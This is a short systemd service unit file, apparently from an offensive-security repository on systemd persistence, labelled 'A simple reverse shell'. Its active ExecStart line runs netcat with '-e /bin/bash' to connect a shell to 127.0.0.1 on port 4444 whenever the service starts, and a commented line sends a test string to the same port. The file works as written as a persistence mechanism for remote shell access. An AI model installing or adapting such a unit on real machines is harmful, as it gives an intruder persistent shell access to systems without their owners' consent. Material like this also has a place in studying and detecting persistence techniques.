; https://www.freedesktop.org/software/systemd/man/systemd.service.html
[Unit]
Description=A simple reverse shell
Documentation=https://github.com/infosec-intern/sneaky-systemd-shit

[Service]
Type=simple
ExecStart=/bin/nc -e /bin/bash 127.0.0.1 4444
;ExecStart=/bin/sh -c "echo success | nc 127.0.0.1 4444"

